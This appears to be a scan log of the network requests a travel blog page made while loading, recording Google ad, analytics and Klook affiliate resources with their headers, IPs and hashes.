alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 8518
x-xss-protection: 0
last-modified: Tue, 30 Mar 2021 23:37:46 GMT
server: sffe
date: Wed, 31 Mar 2021 03:41:49 GMT
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Thu, 31 Mar 2022 03:41:49 GMT

GET
H3-Q050 200 c5.jpg
tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/ Frame E334 7 KB
7 KB 6ms
6ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/c5.jpg?1617143965200

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

48bb8352a6dcfefa13c24ca11be58b98be7f6dd959147f65cff088117e5fe0b6

Security Headers

Name	Value
Content-Security-Policy	default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://.ggpht.com https://.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

content-security-policy: default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://*.ggpht.com https://*.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
x-content-type-options: nosniff
age: 170958
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7161
x-xss-protection: 0
last-modified: Tue, 30 Mar 2021 23:37:46 GMT
server: sffe
date: Wed, 31 Mar 2021 03:41:49 GMT
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Thu, 31 Mar 2022 03:41:49 GMT

GET
H3-Q050 200 activeview Show response
pagead2.googlesyndication.com/pcs/ Frame 28C6 42 B
66 B 16ms
16ms Fetch
image/gif 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsv-4pNF98bYe-QrTlLzFjXJB6u2HQbnVWN5PZionHId5I9L2sIqpzLCzf0qKjAk3IX31WyjhChfgaWVuELJL-g3HP0QXhI8zxge5VV_OWluf0WEOBbuzDi4w-xtwQ&sai=AMfl-YQZSUF03RoGTKz38d7xWnT1PLpPxwovWZxbkiRYQPh7fVKQT_LyU2XktsJHjv9ei89yoLSV0q1u6cNE&sig=Cg0ArKJSzPU4zbh4xRsZEAE&id=osdim&mcvt=1170&p=86,200,366,1400&mtos=1170,1170,1170,1170,1170&tos=1170,0,0,0,0&v=20210331&bin=7&avms=nio&bs=0,0&mc=1&if=1&app=0&itpl=22&adk=605609668&rs=2&met=mue&la=1&cr=0&osd=1&vs=4&rst=1617333065980&dlt=486&rpt=40&isd=0&msd=0&r=v&uup=0

Requested by

Host: www.googletagservices.com
URL: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
x-content-type-options: nosniff
server: cafe
timing-allow-origin: *
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
access-control-allow-origin: *
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
content-type: image/gif
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 42
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET
H3-Q050 200 activeview Show response
pagead2.googlesyndication.com/pcs/ Frame 3A61 42 B
89 B 16ms
16ms Fetch
image/gif 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsvPhhyo7lRLnCRvy-GYwkKGih9NI0vprCXRaBB2DCW9e9uYZ4qQ8Z-T2pakXMU6p10FSiQvGGgluyhHjA-I6MArMssCk61_rKXj7vz3sdz5bojO5hEdeA&sai=AMfl-YRsbs6mVAUKH3oaWEJoHE3r5rTDTaaPriinOuioI6yVc5rag8ghzzo3HmHshLT57Ek5BWM9IPU_WnOSZCVYCADr4UR0vNgUyvSPhrI0aTovJ6Vsqi2s8bJCaXmH&sig=Cg0ArKJSzCu_nfcy0JwvEAE&cid=CAASF-RoNUKpM4H-9Jo7wRSfPPjnf16vRN0t&id=osdim&mcvt=1000&p=595,1102,804,1356&mtos=1000,1000,1000,1000,1000&tos=1000,0,0,0,0&v=20210331&bin=7&avms=nio&bs=0,0&mc=1&if=1&app=0&itpl=22&adk=1389158022&rs=2&met=mue&la=1&cr=1&osd=1&vs=4&rst=1617333066080&dlt=636&rpt=2&isd=0&msd=0&r=v&uup=0

Requested by

Host: www.googletagservices.com
URL: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:08 GMT
x-content-type-options: nosniff
server: cafe
timing-allow-origin: *
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
access-control-allow-origin: *
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
content-type: image/gif
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 42
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET
H2 200 banner.css
cdn.klook.com/affiliate_web/s/widgets/css/ Frame 3E07 7 KB
2 KB 42ms
41ms Stylesheet
text/css 2600:9000:2127:9400:1b:29b:ed80:93a1
AMAZON-02

General

Check archive.org

Show headers Download Go to

Full URL

https://cdn.klook.com/affiliate_web/s/widgets/css/banner.css

Requested by

Host: affiliate.klook.com
URL: https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2127:9400:1b:29b:ed80:93a1 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

nginx /

Resource Hash

79cddd134d150940393477202774c0e0141f0933589811baeb6b8c4e4ed72fd4

Security Headers

Name	Value
Strict-Transport-Security	max-age=63072000; includeSubdomains

Request headers

Referer: https://affiliate.klook.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 17 Mar 2021 03:10:41 GMT
content-encoding: gzip
last-modified: Tue, 20 Aug 2019 02:09:42 GMT
server: nginx
x-amz-cf-pop: PRG50-C1
etag: W/"5d5b5666-1c07"
vary: Accept-Encoding,Accept-Encoding
x-cache: Hit from cloudfront
content-type: text/css
access-control-allow-origin: *
cache-control: max-age=31536000
strict-transport-security: max-age=63072000; includeSubdomains
x-amz-cf-id: IRvKd2hM1rZwaCYBVDKmB0CGwE6kOYVevA4jXnskgTWJ0vWTu_s0eg==
via: 1.1 a1c66294cb416b399374a845b97656d3.cloudfront.net (CloudFront)
expires: Thu, 17 Mar 2022 03:10:41 GMT

GET
H2 200 Klook_250*250@2x.jpg
cdn.klook.com/affiliate_web/s/widgets/imgs/banner_v3/en-US/ Frame 3E07 62 KB
63 KB 89ms
89ms Image
image/jpeg 2600:9000:2127:9400:1b:29b:ed80:93a1
AMAZON-02

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cdn.klook.com/affiliate_web/s/widgets/imgs/banner_v3/en-US/Klook_250*250@2x.jpg

Requested by

Host: affiliate.klook.com
URL: https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2127:9400:1b:29b:ed80:93a1 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

nginx /

Resource Hash

aef1f1a4081771f9bf26d0097eda4a99595be7ce3f3495ed3e34485621312ca7

Security Headers

Name	Value
Strict-Transport-Security	max-age=63072000; includeSubdomains

Request headers

Referer: https://affiliate.klook.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Mon, 08 Feb 2021 01:36:53 GMT
content-encoding: gzip
last-modified: Mon, 16 Sep 2019 07:08:32 GMT
server: nginx
x-amz-cf-pop: PRG50-C1
etag: W/"5d7f34f0-f865"
vary: Accept-Encoding,Accept-Encoding
x-cache: Hit from cloudfront
content-type: image/jpeg
access-control-allow-origin: *
cache-control: max-age=31536000
strict-transport-security: max-age=63072000; includeSubdomains
x-amz-cf-id: jAOeRtAmr5QGt5mLJidT61b1W_dId45X5SK-BjkfPIuyajDE3JJcoA==
via: 1.1 a1c66294cb416b399374a845b97656d3.cloudfront.net (CloudFront)
expires: Tue, 08 Feb 2022 01:36:53 GMT

GET
H3-Q050 200 analytics.js Show response
www.google-analytics.com/ Frame 3E07 48 KB
19 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:802::200e
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google-analytics.com/analytics.js

Requested by

Host: affiliate.klook.com
URL: https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:802::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

f79723478f4c48501cd49ac52b81d6244a6562b9d3f08ce8ab208a8b8878d4c4

Security Headers

Name	Value
Strict-Transport-Security	max-age=10886400; includeSubDomains; preload
X-Content-Type-Options	nosniff

Request headers

Referer: https://affiliate.klook.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=10886400; includeSubDomains; preload
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Fri, 19 Mar 2021 19:22:18 GMT
server: Golfe2
age: 3361
date: Fri, 02 Apr 2021 02:15:07 GMT
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7200
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 19463
expires: Fri, 02 Apr 2021 04:15:07 GMT

GET
H3-Q050 200 gtm.js Show response
www.googletagmanager.com/ Frame 3E07 107 KB
36 KB 19ms
19ms Script
application/javascript 2a00:1450:4001:813::2008
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagmanager.com/gtm.js?id=GTM-WNBGXWM

Requested by

Host: affiliate.klook.com
URL: https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2008 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Google Tag Manager /

Resource Hash

74d7ef5a4c3428a5c3fe91d67962f3fc48e6ed0000ce97f206a7e78ded64c0b7

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains
X-Xss-Protection	0

Request headers

Referer: https://affiliate.klook.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:08 GMT
content-encoding: br
server: Google Tag Manager
access-control-allow-headers: Cache-Control
vary: Accept-Encoding
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
cache-control: private, max-age=900
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=31536000; includeSubDomains
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 36807
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:08 GMT

GET
H2 200 opensans_webfont.woff
cdn.klook.com/affiliate_web/s/widgets/fonts/ Frame 3E07 24 KB
25 KB 113ms
88ms Font
application/font-woff 2600:9000:2127:9400:1b:29b:ed80:93a1
AMAZON-02

General

Check archive.org

Show headers Download Go to

Full URL

https://cdn.klook.com/affiliate_web/s/widgets/fonts/opensans_webfont.woff

Requested by

Host: cdn.klook.com
URL: https://cdn.klook.com/affiliate_web/s/widgets/css/banner.css

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2127:9400:1b:29b:ed80:93a1 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

nginx /

Resource Hash

9f06c5a5a26eed51ed7c0d94bd7bdb822cc503c1e619b463377c44e114e2ca5c

Security Headers

Name	Value
Strict-Transport-Security	max-age=63072000; includeSubdomains

Request headers

Origin: https://affiliate.klook.com
Referer: https://cdn.klook.com/affiliate_web/s/widgets/css/banner.css
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Sat, 06 Feb 2021 01:32:07 GMT
via: 1.1 d9c696d6d0c92f63870873ced2895baa.cloudfront.net (CloudFront)
last-modified: Mon, 19 Aug 2019 10:46:19 GMT
server: nginx
x-amz-cf-pop: PRG50-C1
etag: "5d5a7dfb-6114"
strict-transport-security: max-age=63072000; includeSubdomains
x-cache: Hit from cloudfront
content-type: application/font-woff
access-control-allow-origin: *
cache-control: max-age=31536000
accept-ranges: bytes
content-length: 24852
x-amz-cf-id: IAU8BHoHsUmpIurbGlTTBMuczeBZrohtDv_z4o79ZZzYEXaEP0nt5g==
expires: Sun, 06 Feb 2022 01:32:07 GMT

GET
H3-Q050 200 sodar Show response
pagead2.googlesyndication.com/getconfig/ 8 KB
6 KB 17ms
17ms XHR
application/json 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20210331&st=env

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

f6426d929d157d18668119ea3c3f0c8531c1dbcbf6e0ed66d9ab4966b2c5c5cb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
date: Fri, 02 Apr 2021 03:11:08 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
access-control-allow-origin: *
cache-control: private
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
content-type: application/json; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 6544
x-xss-protection: 0

GET
H3-Q050 200 sodar2.js Show response
tpc.googlesyndication.com/sodar/ 17 KB
6 KB 14ms
14ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/sodar/sodar2.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

c61a719b48533a1fa932729f4927ba1377a96c441b0d6a427096b867742b4645

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:08 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1616005470650935"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 6437
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:08 GMT

GET
H3-Q050 200 runner.html Show response
tpc.googlesyndication.com/sodar/sodar2/222/ Frame 102B 12 KB
5 KB 6ms
6ms Document
text/html 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/sodar/sodar2/222/runner.html

Requested by

Host: tpc.googlesyndication.com
URL: https://tpc.googlesyndication.com/sodar/sodar2.js

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

6836719899bda27cd22c1551cb7fbfc33fb0bbbedaa89e4baa8715fef8202cbc

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: tpc.googlesyndication.com
:scheme: https
:path: /sodar/sodar2/222/runner.html
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: text/html
cross-origin-resource-policy: cross-origin
content-length: 5022
date: Thu, 01 Apr 2021 19:31:34 GMT
expires: Fri, 01 Apr 2022 19:31:34 GMT
last-modified: Wed, 20 Jan 2021 19:23:06 GMT
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
cache-control: public, max-age=31536000
age: 27574
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

GET
H3-Q050 200 71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js Show response
pagead2.googlesyndication.com/bg/ Frame 102B 14 KB
6 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js

Requested by

Host: tpc.googlesyndication.com
URL: https://tpc.googlesyndication.com/sodar/sodar2/222/runner.html

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

ef586bf784948e62385ac9952a5ff1485f8b794c6b29328b71b67038ba26bc4f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://tpc.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 09:59:54 GMT
content-encoding: br
x-content-type-options: nosniff
last-modified: Wed, 24 Mar 2021 17:18:00 GMT
server: sffe
age: 61874
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5693
x-xss-protection: 0
expires: Fri, 01 Apr 2022 09:59:54 GMT

GET
H3-Q050 204 gen_204
pagead2.googlesyndication.com/pagead/ 0
46 B 15ms
15ms Image
image/gif 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://pagead2.googlesyndication.com/pagead/gen_204?id=sodar2&v=222&t=2&li=gda_r20210331&jk=2798626016261363&bg=!HB-lH1vNAAY56aLOOek7ACkAdvg8WmuuU9VRDbFQ96LwgTU8RVEuaGXNhPh-8yK2HlDL3sOaoH76OAIAAAB8UgAAAAtoAQcKAJkpk5PvpwUL-CYA8exy6faqZ0QOKSjTGV0RYJ6HKQPmZ9MWxbD2CYeRdJZbcrl5FTOs8VzJazM1r3NFb5fhJsinH5UkD5TfZqSNcmYsnRy-mxwsiZ4C3MOGeACw-5nryHITXLKc61KYCvA2b_4oaNNlfp8_QRrkU6or0l5FM8Bygq-2htgcBxXlS0I4-6TUx0Feev68lhhnfHyZAdQAcArkuTlxIumWPZK3VKnijlU41x6_LWUGMPGNoFOW2Mb7bX_Pbhi3kKSnvnIlBbOIUM358pAQVARK1VqmlAmipjk1DtOPuURRpfGOyy7oKs-71VIPRyZNcRCvz5X-IXV2hfq7sFqm2yDa3oQgFXylqO88MlDiiC84Tx3j9DXlASlwrlJ-ZKRioZgMYkcNVRsMAE0ZBT6VAXKyAgjvpHUTh0bRjcHUKdgiXwcdsC1-zreXH5XePWNr5WKv0PoeFrWxyTaX5ua6U4yh7ix0_CWOkGOkDJLlaUN1offp8QHxM19b_tq-8E7-77Vv8RCO3PZhz_xFpSUTTBtrlKeoAYDMRkvIGmPHJ1rTvixDGkpT_73SgZl8N4MAvduNcU61I3Oh-jXVgr0_WIWUM-m8JrYuUL7m7koNdanMkW4lvL6a57p8Q6_igXw2vIyASYRKFNbGLc0EJF-1Ipbql56uBd7EyVlx4ji2Ah6XhhfBApXol2pCpA5JkhG3DhHGWdT8nJIGsD5MmMKmnAapdXvD_vOFTcAoqDPApbQjifU8rh3uwQ3j3koYTvF7zpoc0LQx-NuJJvuxzrcV3QnI4bbs3kmOqLkzBPJYmgnsV8HSn8wVj13OVKc

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:08 GMT
x-content-type-options: nosniff
server: cafe
timing-allow-origin: *
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
content-type: image/gif
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0
